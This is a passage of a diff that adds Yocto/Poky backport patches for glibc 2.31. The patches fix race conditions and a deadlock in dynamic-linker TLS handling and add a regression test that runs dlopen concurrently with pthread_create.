atomic_store_relaxed (&GL(dl_tls_generation), newgen); + + /* We need a second pass for static tls data, because + _dl_update_slotinfo must not be run while calls to +diff --git a/elf/dl-tls.c b/elf/dl-tls.c +index 94f3cdbae0..dc69cd984e 100644 +--- a/elf/dl-tls.c ++++ b/elf/dl-tls.c +@@ -96,7 +96,9 @@ + /* No gaps, allocate a new entry. */ + nogaps: + +- result = ++GL(dl_tls_max_dtv_idx); ++ result = GL(dl_tls_max_dtv_idx) + 1; ++ /* Can be read concurrently. */ ++ atomic_store_relaxed (&GL(dl_tls_max_dtv_idx), result); + } + + return result; +@@ -279,10 +281,12 @@ + dtv_t *dtv; + size_t dtv_length; + ++ /* Relaxed MO, because the dtv size is later rechecked, not relied on. */ ++ size_t max_modid = atomic_load_relaxed (&GL(dl_tls_max_dtv_idx)); + /* We allocate a few more elements in the dtv than are needed for the + initial set of modules. This should avoid in most cases expansions + of the dtv. */ +- dtv_length = GL(dl_tls_max_dtv_idx) + DTV_SURPLUS; ++ dtv_length = max_modid + DTV_SURPLUS; + dtv = calloc (dtv_length + 2, sizeof (dtv_t)); + if (dtv != NULL) + { +@@ -687,7 +691,7 @@ + if (modid > max_modid) + break; + +- size_t gen = listp->slotinfo[cnt].gen; ++ size_t gen = atomic_load_relaxed (&listp->slotinfo[cnt].gen); + + if (gen > new_gen) + /* Not relevant. */ +@@ -699,7 +703,8 @@ + continue; + + /* If there is no map this means the entry is empty. */ +- struct link_map *map = listp->slotinfo[cnt].map; ++ struct link_map *map ++ = atomic_load_relaxed (&listp->slotinfo[cnt].map); + /* Check whether the current dtv array is large enough. */ + if (dtv[-1].counter < modid) + { +@@ -843,7 +848,12 @@ + { + dtv_t *dtv = THREAD_DTV (); + +- if (__glibc_unlikely (dtv[0].counter != GL(dl_tls_generation))) ++ /* Update is needed if dtv[0].counter < the generation of the accessed ++ module. The global generation counter is used here as it is easier ++ to check. Synchronization for the relaxed MO access is guaranteed ++ by user code, see CONCURRENCY NOTES in _dl_update_slotinfo. */ ++ size_t gen = atomic_load_relaxed (&GL(dl_tls_generation)); ++ if (__glibc_unlikely (dtv[0].counter != gen)) + return update_get_addr (GET_ADDR_PARAM); + + void *p = dtv[GET_ADDR_MODULE].pointer.val; +@@ -866,7 +876,10 @@ + return NULL; + + dtv_t *dtv = THREAD_DTV (); +- if (__glibc_unlikely (dtv[0].counter != GL(dl_tls_generation))) ++ /* This may be called without holding the GL(dl_load_lock). Reading ++ arbitrary gen value is fine since this is best effort code. */ ++ size_t gen = atomic_load_relaxed (&GL(dl_tls_generation)); ++ if (__glibc_unlikely (dtv[0].counter != gen)) + { + /* This thread's DTV is not completely current, + but it might already cover this module. */ +@@ -961,7 +974,9 @@ + /* Add the information into the slotinfo data structure. */ + if (do_add) + { +- listp->slotinfo[idx].map = l; +- listp->slotinfo[idx].gen = GL(dl_tls_generation) + 1; ++ /* Can be read concurrently. See _dl_update_slotinfo. */ ++ atomic_store_relaxed (&listp->slotinfo[idx].map, l); ++ atomic_store_relaxed (&listp->slotinfo[idx].gen, ++ GL(dl_tls_generation) + 1); + } + } + +diff --git a/sysdeps/x86_64/dl-tls.c b/sysdeps/x86_64/dl-tls.c +index 6595f6615b..24ef560b71 100644 +--- a/sysdeps/x86_64/dl-tls.c ++++ b/sysdeps/x86_64/dl-tls.c +@@ -40,7 +40,8 @@ __tls_get_addr_slow (GET_ADDR_ARGS) + { + dtv_t *dtv = THREAD_DTV (); + +- if (__glibc_unlikely (dtv[0].counter != GL(dl_tls_generation))) ++ size_t gen = atomic_load_relaxed (&GL(dl_tls_generation)); ++ if (__glibc_unlikely (dtv[0].counter != gen)) + return update_get_addr (GET_ADDR_PARAM); + + return tls_get_addr_tail (GET_ADDR_PARAM, dtv, NULL); +-- +2.27.0 diff --git a/poky/meta/recipes-core/glibc/glibc/0033-elf-Add-test-case-for-BZ-19329.patch b/poky/meta/recipes-core/glibc/glibc/0033-elf-Add-test-case-for-BZ-19329.patch new file mode 100644 index 0000000000..f22e52ea99 --- /dev/null +++ b/poky/meta/recipes-core/glibc/glibc/0033-elf-Add-test-case-for-BZ-19329.patch @@ -0,0 +1,144 @@ +From 9d0e30329c23b5ad736fda3f174208c25970dbce Mon Sep 17 00:00:00 2001 +From: Szabolcs Nagy <szabolcs.nagy@arm.com> +Date: Tue, 13 Dec 2016 12:28:41 +0000 +Subject: [PATCH] elf: Add test case for [BZ #19329] + +Test concurrent dlopen and pthread_create when the loaded modules have +TLS. This triggers dl-tls assertion failures more reliably than the +nptl/tst-stack4 test. + +The dlopened module has 100 DT_NEEDED dependencies with TLS, they were +reused from an existing TLS test. The number of created threads during +dlopen depends on filesystem speed and hardware, but at most 3 threads +are alive at a time to limit resource usage. + +Reviewed-by: Adhemerval Zanella <adhemerval.zanella@linaro.org> +--- + elf/Makefile | 9 ++++-- + elf/tst-tls21.c | 68 ++++++++++++++++++++++++++++++++++++++++++++++ + elf/tst-tls21mod.c | 1 + + 3 files changed, 76 insertions(+), 2 deletions(-) + create mode 100644 elf/tst-tls21.c + create mode 100644 elf/tst-tls21mod.c +--- +Upstream-Status: Backport [https://sourceware.org/git/?p=glibc.git;a=patch;h=9d0e30329c23b5ad736fda3f174208c25970dbce] +Comment: Hunks from elf/Makefile are refreshed as per glibc 2.31 codebase. +Signed-off-by: Akash Hadke <akash.hadke@kpit.com> +Signed-off-by: Akash Hadke <hadkeakash4@gmail.com> +--- +diff --git a/elf/Makefile b/elf/Makefile +index d3e909637a..3241cb6046 100644 +--- a/elf/Makefile ++++ b/elf/Makefile +@@ -201,7 +201,7 @@ + tst-unwind-ctor tst-unwind-main tst-audit13 \ + tst-sonamemove-link tst-sonamemove-dlopen tst-dlopen-tlsmodid \ + tst-dlopen-self tst-auditmany tst-initfinilazyfail tst-dlopenfail \ +- tst-dlopenfail-2 ++ tst-dlopenfail-2 tst-tls21 + # reldep9 + tests-internal += loadtest unload unload2 circleload1 \ + neededtest neededtest2 neededtest3 neededtest4 \ +@@ -312,7 +312,7 @@ + tst-auditmanymod7 tst-auditmanymod8 tst-auditmanymod9 \ + tst-initlazyfailmod tst-finilazyfailmod \ + tst-dlopenfailmod1 tst-dlopenfaillinkmod tst-dlopenfailmod2 \ +- tst-dlopenfailmod3 tst-ldconfig-ld-mod ++ tst-dlopenfailmod3 tst-ldconfig-ld-mod tst-tls21mod + # Most modules build with _ISOMAC defined, but those filtered out + # depend on internal headers. + modules-names-tests = $(filter-out ifuncmod% tst-libc_dlvsym-dso tst-tlsmod%,\ +@@ -1697,5 +1697,10 @@ + $(objpfx)tst-dlopen-nodelete-reloc-mod16.so + LDFLAGS-tst-dlopen-nodelete-reloc-mod17.so = -Wl,--no-as-needed + ++# Reuses tst-tls-many-dynamic-modules ++$(objpfx)tst-tls21: $(libdl) $(shared-thread-library) ++$(objpfx)tst-tls21.out: $(objpfx)tst-tls21mod.so ++$(objpfx)tst-tls21mod.so: $(tst-tls-many-dynamic-modules:%=$(objpfx)%.so) ++ + $(objpfx)tst-ldconfig-ld_so_conf-update.out: $(objpfx)tst-ldconfig-ld-mod.so + $(objpfx)tst-ldconfig-ld_so_conf-update: $(libdl) +diff --git a/elf/tst-tls21.c b/elf/tst-tls21.c +new file mode 100644 +index 0000000000..560bf5813a +--- /dev/null ++++ b/elf/tst-tls21.c +@@ -0,0 +1,68 @@ ++/* Test concurrent dlopen and pthread_create: BZ 19329. ++ Copyright (C) 2021 Free Software Foundation, Inc. ++ This file is part of the GNU C Library. ++ ++ The GNU C Library is free software; you can redistribute it and/or ++ modify it under the terms of the GNU Lesser General Public ++ License as published by the Free Software Foundation; either ++ version 2.1 of the License, or (at your option) any later version. ++ ++ The GNU C Library is distributed in the hope that it will be useful, ++ but WITHOUT ANY WARRANTY; without even the implied warranty of ++ MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU ++ Lesser General Public License for more details. ++ ++ You should have received a copy of the GNU Lesser General Public ++ License along with the GNU C Library; if not, see ++ <http://www.gnu.org/licenses/>. */ ++ ++#include <dlfcn.h> ++#include <pthread.h> ++#include <stdio.h> ++#include <stdatomic.h> ++#include <support/xdlfcn.h> ++#include <support/xthread.h> ++ ++#define THREADS 10000 ++ ++static atomic_int done; ++ ++static void * ++start (void *a) ++{ ++ /* Load a module with many dependencies that each have TLS. */ ++ xdlopen ("tst-tls21mod.so", RTLD_LAZY); ++ atomic_store_explicit (&done, 1, memory_order_release); ++ return 0; ++} ++ ++static void * ++nop (void *a) ++{ ++ return 0; ++} ++ ++static int ++do_test (void) ++{ ++ pthread_t t1, t2; ++ int i; ++ ++ /* Load a module with lots of dependencies and TLS. */ ++ t1 = xpthread_create (0, start, 0); ++ ++ /* Concurrently create lots of threads until dlopen is observably done. */ ++ for (i = 0; i < THREADS; i++) ++ { ++ if (atomic_load_explicit (&done, memory_order_acquire) != 0) ++ break; ++ t2 = xpthread_create (0, nop, 0); ++ xpthread_join (t2); ++ } ++ ++ xpthread_join (t1); ++ printf ("threads created during dlopen: %d\n", i); ++ return 0; ++} ++ ++#include <support/test-driver.c> +diff --git a/elf/tst-tls21mod.c b/elf/tst-tls21mod.c +new file mode 100644 +index 0000000000..206ece4fb3 +--- /dev/null ++++ b/elf/tst-tls21mod.c +@@ -0,0 +1 @@ ++int __thread x; +-- +2.27.0 diff --git a/poky/meta/recipes-core/glibc/glibc/0034-elf-Fix-DTV-gap-reuse-logic-BZ-27135.patch b/poky/meta/recipes-core/glibc/glibc/0034-elf-Fix-DTV-gap-reuse-logic-BZ-27135.patch new file mode 100644 index 0000000000..a87afe3230 --- /dev/null +++ b/poky/meta/recipes-core/glibc/glibc/0034-elf-Fix-DTV-gap-reuse-logic-BZ-27135.patch @@ -0,0 +1,180 @@ +From ba33937be210da5d07f7f01709323743f66011ce Mon Sep 17 00:00:00 2001 +From: Adhemerval Zanella <adhemerval.zanella@linaro.org> +Date: Fri, 25 Jun 2021 10:54:12 -0300 +Subject: [PATCH] elf: Fix DTV gap reuse logic (BZ #27135) + +This is updated version of the 572bd547d57a (reverted by 40ebfd016ad2) +that fixes the _dl_next_tls_modid issues. + +This issue with 572bd547d57a patch is the DTV entry will be only +update on dl_open_worker() with the update_tls_slotinfo() call after +all dependencies are being processed by _dl_map_object_deps(). However +_dl_map_object_deps() itself might call _dl_next_tls_modid(), and since +the _dl_tls_dtv_slotinfo_list::map is not yet set the entry will be +wrongly reused. + +This patch fixes by renaming the _dl_next_tls_modid() function to +_dl_assign_tls_modid() and by passing the link_map so it can set +the slotinfo value so a subsequente _dl_next_tls_modid() call will +see the entry as allocated. + +The intermediary value is cleared up on remove_slotinfo() for the case +a library fails to load with RTLD_NOW. + +This patch fixes BZ #27135. + +Checked on x86_64-linux-gnu. + +Reviewed-by: Szabolcs Nagy <szabolcs.nagy@arm.com> +--- + elf/dl-close.c | 8 +- + elf/dl-load.c | 2 +- + elf/dl-open.c | 10 -- + elf/dl-tls.c | 17 +-- + elf/rtld.c | 2 +- + sysdeps/generic/ldsodefs.h | 4 +- + 6 files changed, 349 insertions(+), 33 deletions(-) +--- +Upstream-Status: Backport [https://sourceware.org/git/?p=glibc.git;a=patch;h=ba33937be210da5d07f7f01709323743f66011ce] +Comment: Removed hunks those were related to test. Hunk from elf/rtld.c is refreshed. +Signed-off-by: Akash Hadke <akash.hadke@kpit.com> +Signed-off-by: Akash Hadke <hadkeakash4@gmail.com> +--- +diff --git a/elf/dl-close.c b/elf/dl-close.c +index 3720e47dd1..f39001cab9 100644 +--- a/elf/dl-close.c ++++ b/elf/dl-close.c +@@ -77,8 +77,6 @@ remove_slotinfo (size_t idx, struct dtv_slotinfo_list *listp, size_t disp, + object that wasn't fully set up. */ + if (__glibc_likely (old_map != NULL)) + { +- assert (old_map->l_tls_modid == idx); +- + /* Mark the entry as unused. These can be read concurrently. */ + atomic_store_relaxed (&listp->slotinfo[idx - disp].gen, + GL(dl_tls_generation) + 1); +@@ -88,7 +86,11 @@ remove_slotinfo (size_t idx, struct dtv_slotinfo_list *listp, size_t disp, + /* If this is not the last currently used entry no need to look + further. */ + if (idx != GL(dl_tls_max_dtv_idx)) +- return true; ++ { ++ /* There is an unused dtv entry in the middle. */ ++ GL(dl_tls_dtv_gaps) = true; ++ return true; ++ } + } + + while (idx - disp > (disp == 0 ? 1 + GL(dl_tls_static_nelem) : 0)) +diff --git a/elf/dl-load.c b/elf/dl-load.c +index a08df001af..650e4edc35 100644 +--- a/elf/dl-load.c ++++ b/elf/dl-load.c +@@ -1498,7 +1498,7 @@ cannot enable executable stack as shared object requires"); + not set up TLS data structures, so don't use them now. */ + || __glibc_likely (GL(dl_tls_dtv_slotinfo_list) != NULL))) + /* Assign the next available module ID. */ +- l->l_tls_modid = _dl_next_tls_modid (); ++ _dl_assign_tls_modid (l); + + #ifdef DL_AFTER_LOAD + DL_AFTER_LOAD (l); +diff --git a/elf/dl-open.c b/elf/dl-open.c +index a066f39bd0..d2240d8747 100644 +--- a/elf/dl-open.c ++++ b/elf/dl-open.c +@@ -899,16 +899,6 @@ no more namespaces available for dlmopen()")); + state if relocation failed, for example. */ + if (args.map) + { +- /* Maybe some of the modules which were loaded use TLS. +- Since it will be removed in the following _dl_close call +- we have to mark the dtv array as having gaps to fill the +- holes. This is a pessimistic assumption which won't hurt +- if not true. There is no need to do this when we are +- loading the auditing DSOs since TLS has not yet been set +- up. */ +- if ((mode & __RTLD_AUDIT) == 0) +- GL(dl_tls_dtv_gaps) = true; +- + _dl_close_worker (args.map, true); + + /* All l_nodelete_pending objects should have been deleted +diff --git a/elf/dl-tls.c b/elf/dl-tls.c +index 2b5161d10a..423e380f7c 100644 +--- a/elf/dl-tls.c ++++ b/elf/dl-tls.c +@@ -126,8 +126,8 @@ oom (void) + } + + +-size_t +-_dl_next_tls_modid (void) ++void ++_dl_assign_tls_modid (struct link_map *l) + { + size_t result; + +@@ -157,7 +157,11 @@ _dl_next_tls_modid (void) + } + + if (result - disp < runp->len) +- break; ++ { ++ /* Mark the entry as used, so any dependency see it. */ ++ atomic_store_relaxed (&runp->slotinfo[result - disp].map, l); ++ break; ++ } + + disp += runp->len; + } +@@ -184,17 +188,14 @@ _dl_next_tls_modid (void) + atomic_store_relaxed (&GL(dl_tls_max_dtv_idx), result); + } + +- return result; ++ l->l_tls_modid = result; + } + + + size_t + _dl_count_modids (void) + { +- /* It is rare that we have gaps; see elf/dl-open.c (_dl_open) where +- we fail to load a module and unload it leaving a gap. If we don't +- have gaps then the number of modids is the current maximum so +- return that. */ ++ /* The count is the max unless dlclose or failed dlopen created gaps. */ + if (__glibc_likely (!GL(dl_tls_dtv_gaps))) + return GL(dl_tls_max_dtv_idx); + +diff --git a/elf/rtld.c b/elf/rtld.c +index e3fb2a5b2a..d733359eaf 100644 +--- a/elf/rtld.c ++++ b/elf/rtld.c +@@ -1612,7 +1612,7 @@ + /* Add the dynamic linker to the TLS list if it also uses TLS. */ + if (GL(dl_rtld_map).l_tls_blocksize != 0) + /* Assign a module ID. Do this before loading any audit modules. */ +- GL(dl_rtld_map).l_tls_modid = _dl_next_tls_modid (); ++ _dl_assign_tls_modid (&GL(dl_rtld_map)); + + /* If we have auditing DSOs to load, do it now. */ + bool need_security_init = true; +diff --git a/sysdeps/generic/ldsodefs.h b/sysdeps/generic/ldsodefs.h +index 176394de4d..9c15259236 100644 +--- a/sysdeps/generic/ldsodefs.h ++++ b/sysdeps/generic/ldsodefs.h +@@ -1171,8 +1171,8 @@ extern ElfW(Addr) _dl_sysdep_start (void **start_argptr, + extern void _dl_sysdep_start_cleanup (void) attribute_hidden; + + +-/* Determine next available module ID. */ +-extern size_t _dl_next_tls_modid (void) attribute_hidden; ++/* Determine next available module ID and set the L l_tls_modid. */ ++extern void _dl_assign_tls_modid (struct link_map *l) attribute_hidden; + + /* Count the modules with TLS segments. */ + extern size_t _dl_count_modids (void) attribute_hidden; +-- +2.27.0 diff --git a/poky/meta/recipes-core/glibc/glibc/0035-x86_64-Avoid-lazy-relocation-of-tlsdesc-BZ-27137.patch b/poky/meta/recipes-core/glibc/glibc/0035-x86_64-Avoid-lazy-relocation-of-tlsdesc-BZ-27137.patch new file mode 100644 index 0000000000..899111b118 --- /dev/null +++ b/poky/meta/recipes-core/glibc/glibc/0035-x86_64-Avoid-lazy-relocation-of-tlsdesc-BZ-27137.patch @@ -0,0 +1,56 @@ +From 8f7e09f4dbdb5c815a18b8285fbc5d5d7bc17d86 Mon Sep 17 00:00:00 2001 +From: Szabolcs Nagy <szabolcs.nagy@arm.com> +Date: Thu, 11 Feb 2021 11:29:23 +0000 +Subject: [PATCH] x86_64: Avoid lazy relocation of tlsdesc [BZ #27137] + +Lazy tlsdesc relocation is racy because the static tls optimization and +tlsdesc management operations are done without holding the dlopen lock. + +This similar to the commit b7cf203b5c17dd6d9878537d41e0c7cc3d270a67 +for aarch64, but it fixes a different race: bug 27137. + +Another issue is that ld auditing ignores DT_BIND_NOW and thus tries to +relocate tlsdesc lazily, but that does not work in a BIND_NOW module +due to missing DT_TLSDESC_PLT. Unconditionally relocating tlsdesc at +load time fixes this bug 27721 too. +--- + sysdeps/x86_64/dl-machine.h | 19 ++++++++++++++----- + 1 file changed, 14 insertions(+), 5 deletions(-) +--- +Upstream-Status: Backport [https://sourceware.org/git/?p=glibc.git;a=patch;h=8f7e09f4dbdb5c815a18b8285fbc5d5d7bc17d86] +Signed-off-by: Akash Hadke <akash.hadke@kpit.com> +Signed-off-by: Akash Hadke <hadkeakash4@gmail.com> +--- +diff --git a/sysdeps/x86_64/dl-machine.h b/sysdeps/x86_64/dl-machine.h +index 103eee6c3f..9a876a371e 100644 +--- a/sysdeps/x86_64/dl-machine.h ++++ b/sysdeps/x86_64/dl-machine.h +@@ -570,12 +570,21 @@ elf_machine_lazy_rel (struct link_map *map, + } + else if (__glibc_likely (r_type == R_X86_64_TLSDESC)) + { +- struct tlsdesc volatile * __attribute__((__unused__)) td = +- (struct tlsdesc volatile *)reloc_addr; ++ const Elf_Symndx symndx = ELFW (R_SYM) (reloc->r_info); ++ const ElfW (Sym) *symtab = (const void *)D_PTR (map, l_info[DT_SYMTAB]); ++ const ElfW (Sym) *sym = &symtab[symndx]; ++ const struct r_found_version *version = NULL; + +- td->arg = (void*)reloc; +- td->entry = (void*)(D_PTR (map, l_info[ADDRIDX (DT_TLSDESC_PLT)]) +- + map->l_addr); ++ if (map->l_info[VERSYMIDX (DT_VERSYM)] != NULL) ++ { ++ const ElfW (Half) *vernum = ++ (const void *)D_PTR (map, l_info[VERSYMIDX (DT_VERSYM)]); ++ version = &map->l_versions[vernum[symndx] & 0x7fff]; ++ } ++ ++ /* Always initialize TLS descriptors completely at load time, in ++ case static TLS is allocated for it that requires locking. */ ++ elf_machine_rela (map, reloc, sym, version, reloc_addr, skip_ifunc); + } + else if (__glibc_unlikely (r_type == R_X86_64_IRELATIVE)) + { +-- +2.27.0 diff --git a/poky/meta/recipes-core/glibc/glibc/0036-i386-Avoid-lazy-relocation-of-tlsdesc-BZ-27137.patch b/poky/meta/recipes-core/glibc/glibc/0036-i386-Avoid-lazy-relocation-of-tlsdesc-BZ-27137.patch new file mode 100644 index 0000000000..ad0a1147aa --- /dev/null +++ b/poky/meta/recipes-core/glibc/glibc/0036-i386-Avoid-lazy-relocation-of-tlsdesc-BZ-27137.patch @@ -0,0 +1,124 @@ +From ddcacd91cc10ff92d6201eda87047d029c14158d Mon Sep 17 00:00:00 2001 +From: Szabolcs Nagy <szabolcs.nagy@arm.com> +Date: Thu, 11 Feb 2021 11:40:11 +0000 +Subject: [PATCH] i386: Avoid lazy relocation of tlsdesc [BZ #27137] + +Lazy tlsdesc relocation is racy because the static tls optimization and +tlsdesc management operations are done without holding the dlopen lock. + +This similar to the commit b7cf203b5c17dd6d9878537d41e0c7cc3d270a67 +for aarch64, but it fixes a different race: bug 27137. + +On i386 the code is a bit more complicated than on x86_64 because both +rel and rela relocs are supported. +--- + sysdeps/i386/dl-machine.h | 76 ++++++++++++++++++--------------------- + 1 file changed, 34 insertions(+), 42 deletions(-) +--- +Upstream-Status: Backport [https://sourceware.org/git/?p=glibc.git;a=patch;h=ddcacd91cc10ff92d6201eda87047d029c14158d] +Signed-off-by: Akash Hadke <akash.hadke@kpit.com> +Signed-off-by: Akash Hadke <hadkeakash4@gmail.com> +--- +diff --git a/sysdeps/i386/dl-machine.h b/sysdeps/i386/dl-machine.h +index 23e9cc3bfb..590b41d8d7 100644 +--- a/sysdeps/i386/dl-machine.h ++++ b/sysdeps/i386/dl-machine.h +@@ -688,50 +688,32 @@ elf_machine_lazy_rel (struct link_map *map, + } + else if (__glibc_likely (r_type == R_386_TLS_DESC)) + { +- struct tlsdesc volatile * __attribute__((__unused__)) td = +- (struct tlsdesc volatile *)reloc_addr; +- +- /* Handle relocations that reference the local *ABS* in a simple +- way, so as to preserve a potential addend. */ +- if (ELF32_R_SYM (reloc->r_info) == 0) +- td->entry = _dl_tlsdesc_resolve_abs_plus_addend; +- /* Given a known-zero addend, we can store a pointer to the +- reloc in the arg position. */ +- else if (td->arg == 0) +- { +- td->arg = (void*)reloc; +- td->entry = _dl_tlsdesc_resolve_rel; +- } +- else +- { +- /* We could handle non-*ABS* relocations with non-zero addends +- by allocating dynamically an arg to hold a pointer to the +- reloc, but that sounds pointless. */ +- const Elf32_Rel *const r = reloc; +- /* The code below was borrowed from elf_dynamic_do_rel(). */ +- const ElfW(Sym) *const symtab = +- (const void *) D_PTR (map, l_info[DT_SYMTAB]); ++ const Elf32_Rel *const r = reloc; ++ /* The code below was borrowed from elf_dynamic_do_rel(). */ ++ const ElfW(Sym) *const symtab = ++ (const void *) D_PTR (map, l_info[DT_SYMTAB]); + ++ /* Always initialize TLS descriptors completely at load time, in ++ case static TLS is allocated for it that requires locking. */ + # ifdef RTLD_BOOTSTRAP +- /* The dynamic linker always uses versioning. */ +- assert (map->l_info[VERSYMIDX (DT_VERSYM)] != NULL); ++ /* The dynamic linker always uses versioning. */ ++ assert (map->l_info[VERSYMIDX (DT_VERSYM)] != NULL); + # else +- if (map->l_info[VERSYMIDX (DT_VERSYM)]) ++ if (map->l_info[VERSYMIDX (DT_VERSYM)]) + # endif +- { +- const ElfW(Half) *const version = +- (const void *) D_PTR (map, l_info[VERSYMIDX (DT_VERSYM)]); +- ElfW(Half) ndx = version[ELFW(R_SYM) (r->r_info)] & 0x7fff; +- elf_machine_rel (map, r, &symtab[ELFW(R_SYM) (r->r_info)], +- &map->l_versions[ndx], +- (void *) (l_addr + r->r_offset), skip_ifunc); +- } ++ { ++ const ElfW(Half) *const version = ++ (const void *) D_PTR (map, l_info[VERSYMIDX (DT_VERSYM)]); ++ ElfW(Half) ndx = version[ELFW(R_SYM) (r->r_info)] & 0x7fff; ++ elf_machine_rel (map, r, &symtab[ELFW(R_SYM) (r->r_info)], ++ &map->l_versions[ndx], ++ (void *) (l_addr + r->r_offset), skip_ifunc); ++ } + # ifndef RTLD_BOOTSTRAP +- else +- elf_machine_rel (map, r, &symtab[ELFW(R_SYM) (r->r_info)], NULL, +- (void *) (l_addr + r->r_offset), skip_ifunc); ++ else ++ elf_machine_rel (map, r, &symtab[ELFW(R_SYM) (r->r_info)], NULL, ++ (void *) (l_addr + r->r_offset), skip_ifunc); + # endif +- } + } + else if (__glibc_unlikely (r_type == R_386_IRELATIVE)) + { +@@ -758,11 +740,21 @@ elf_machine_lazy_rela (struct link_map *map, + ; + else if (__glibc_likely (r_type == R_386_TLS_DESC)) + { +- struct tlsdesc volatile * __attribute__((__unused__)) td = +- (struct tlsdesc volatile *)reloc_addr; ++ const Elf_Symndx symndx = ELFW (R_SYM) (reloc->r_info); ++ const ElfW (Sym) *symtab = (const void *)D_PTR (map, l_info[DT_SYMTAB]); ++ const ElfW (Sym) *sym = &symtab[symndx]; ++ const struct r_found_version *version = NULL; ++ ++ if (map->l_info[VERSYMIDX (DT_VERSYM)] != NULL) ++ { ++ const ElfW (Half) *vernum = ++ (const void *)D_PTR (map, l_info[VERSYMIDX (DT_VERSYM)]); ++ version = &map->l_versions[vernum[symndx] & 0x7fff]; ++ } + +- td->arg = (void*)reloc; +- td->entry = _dl_tlsdesc_resolve_rela; ++ /* Always initialize TLS descriptors completely at load time, in ++ case static TLS is allocated for it that requires locking. */ ++ elf_machine_rela (map, reloc, sym, version, reloc_addr, skip_ifunc); + } + else if (__glibc_unlikely (r_type == R_386_IRELATIVE)) + { +-- +2.27.0 diff --git a/poky/meta/recipes-core/glibc/glibc/0037-Avoid-deadlock-between-pthread_create-and-ctors.patch b/poky/meta/recipes-core/glibc/glibc/0037-Avoid-deadlock-between-pthread_create-and-ctors.patch new file mode 100644 index 0000000000..7a10131bad --- /dev/null +++ b/poky/meta/recipes-core/glibc/glibc/0037-Avoid-deadlock-between-pthread_create-and-ctors.patch @@ -0,0 +1,276 @@ +From 83b5323261bb72313bffcf37476c1b8f0847c736 Mon Sep 17 00:00:00 2001 +From: Szabolcs Nagy <szabolcs.nagy@arm.com> +Date: Wed, 15 Sep 2021 15:16:19 +0100 +Subject: [PATCH] elf: Avoid deadlock between pthread_create and ctors [BZ + #28357] + +The fix for bug 19329 caused a regression such that pthread_create can +deadlock when concurrent ctors from dlopen are waiting for it to finish. +Use a new GL(dl_load_tls_lock) in pthread_create that is not taken +around ctors in dlopen. + +The new lock is also used in __tls_get_addr instead of GL(dl_load_lock). + +The new lock is held in _dl_open_worker and _dl_close_worker around +most of the logic before/after the init/fini routines. When init/fini +routines are running then TLS is in a consistent, usable state. +In _dl_open_worker the new lock requires catching and reraising dlopen +failures that happen in the critical section. + +The new lock is reinitialized in a fork child, to keep the existing +behaviour and it is kept recursive in case malloc interposition or TLS +access from signal handlers can retake it. It is not obvious if this +is necessary or helps, but avoids changing the preexisting behaviour. + +The new lock may be more appropriate for dl_iterate_phdr too than +GL(dl_load_write_lock), since TLS state of an incompletely loaded +module may be accessed. If the new lock can replace the old one, +that can be a separate change. + +Fixes bug 28357. + +Reviewed-by: Adhemerval Zanella <adhemerval.zanella@linaro.org> +--- + elf/dl-close.c | 6 ++ + elf/dl-open.c | 35 ++++++++- + elf/dl-support.c | 7 ++ + elf/dl-tls.c | 16 ++--- + elf/rtld.c | 1 + + sysdeps/nptl/fork.c | 3 + + sysdeps/generic/ldsodefs.h | 9 ++- + 10 files changed, 235 insertions(+), 12 deletions(-) +--- +Upstream-Status: Backport [https://sourceware.org/git/?p=glibc.git;a=patch;h=024a7640ab9ecea80e527f4e4d7f7a1868e952c5] +Comment: This patch is refreshed for glibc 2.31. In upstream glibc 2.34 multiple src files are shuffled, updated this patch as per the code present in glibc 2.31. Removed test case. +Signed-off-by: Akash Hadke <akash.hadke@kpit.com> +Signed-off-by: Akash Hadke <hadkeakash4@gmail.com> +--- +diff --git a/elf/dl-close.c b/elf/dl-close.c +index 93ff5c96e9..cfe0f1c0c9 100644 +--- a/elf/dl-close.c ++++ b/elf/dl-close.c +@@ -551,6 +551,9 @@ + size_t tls_free_end; + tls_free_start = tls_free_end = NO_TLS_OFFSET; + ++ /* Protects global and module specitic TLS state. */ ++ __rtld_lock_lock_recursive (GL(dl_load_tls_lock)); ++ + /* We modify the list of loaded objects. */ + __rtld_lock_lock_recursive (GL(dl_load_write_lock)); + +@@ -786,6 +789,9 @@ + GL(dl_tls_static_used) = tls_free_start; + } + ++ /* TLS is cleaned up for the unloaded modules. */ ++ __rtld_lock_unlock_recursive (GL(dl_load_tls_lock)); ++ + #ifdef SHARED + /* Auditing checkpoint: we have deleted all objects. */ + if (__glibc_unlikely (do_audit)) +diff --git a/elf/dl-open.c b/elf/dl-open.c +index 5295e931b0..6ea5dd2457 100644 +--- a/elf/dl-open.c ++++ b/elf/dl-open.c +@@ -57,6 +57,9 @@ + (non-negative). */ + unsigned int original_global_scope_pending_adds; + ++ /* Set to true if the end of dl_open_worker_begin was reached. */ ++ bool worker_continue; ++ + /* Original parameters to the program and the current environment. */ + int argc; + char **argv; +@@ -473,7 +473,7 @@ + } + + static void +-dl_open_worker (void *a) ++dl_open_worker_begin (void *a) + { + struct dl_open_args *args = a; + const char *file = args->file; +@@ -747,6 +747,36 @@ + if (mode & RTLD_GLOBAL) + add_to_global_resize (new); + ++ args->worker_continue = true; ++} ++ ++static void ++dl_open_worker (void *a) ++{ ++ struct dl_open_args *args = a; ++ ++ args->worker_continue = false; ++ ++ { ++ /* Protects global and module specific TLS state. */ ++ __rtld_lock_lock_recursive (GL(dl_load_tls_lock)); ++ ++ struct dl_exception ex; ++ int err = _dl_catch_exception (&ex, dl_open_worker_begin, args); ++ ++ __rtld_lock_unlock_recursive (GL(dl_load_tls_lock)); ++ ++ if (__glibc_unlikely (ex.errstring != NULL)) ++ /* Reraise the error. */ ++ _dl_signal_exception (err, &ex, NULL); ++ } ++ ++ if (!args->worker_continue) ++ return; ++ ++ int mode = args->mode; ++ struct link_map *new = args->map; ++ + /* Run the initializer functions of new objects. Temporarily + disable the exception handler, so that lazy binding failures are + fatal. */ +diff --git a/elf/dl-support.c b/elf/dl-support.c +index 02e2ed72f5..d99c1f1d62 100644 +--- a/elf/dl-support.c ++++ b/elf/dl-support.c +@@ -219,6 +219,13 @@ + list of loaded objects while an object is added to or removed from + that list. */ + __rtld_lock_define_initialized_recursive (, _dl_load_write_lock) ++/* This lock protects global and module specific TLS related data. ++ E.g. it is held in dlopen and dlclose when GL(dl_tls_generation), ++ GL(dl_tls_max_dtv_idx) or GL(dl_tls_dtv_slotinfo_list) are ++ accessed and when TLS related relocations are processed for a ++ module. It was introduced to keep pthread_create accessing TLS ++ state that is being set up. */ ++__rtld_lock_define_initialized_recursive (, _dl_load_tls_lock) + + + #ifdef HAVE_AUX_VECTOR +diff --git 